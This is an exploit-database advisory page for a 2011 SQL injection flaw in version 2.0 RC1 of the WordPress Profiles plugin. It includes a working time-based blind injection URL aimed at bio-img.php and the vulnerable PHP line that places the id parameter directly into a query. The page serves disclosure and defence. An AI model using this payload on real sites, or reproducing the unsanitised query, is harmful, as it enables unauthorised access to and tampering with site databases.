header-logo
Suggest Exploit
vendor:
Profiles
by:
Miroslav Stampar
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Profiles
Affected Version From: 2.0 RC1
Affected Version To: 2.0 RC1
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:profiles
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability

A SQL injection vulnerability exists in the WordPress Profiles plugin version 2.0 RC1. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to inject arbitrary SQL commands into the application, allowing them to access, modify, or delete data from the application's back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/profiles.2.0.RC1.zip
# Version: 2.0 RC1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/profiles/library/bio-img.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$query = "SELECT * FROM ".$wpdb->prefix."bios WHERE id='$_GET[id]'";
...
$result = mysql_query($query);

Navigation

Suggest Exploit

Services By CQR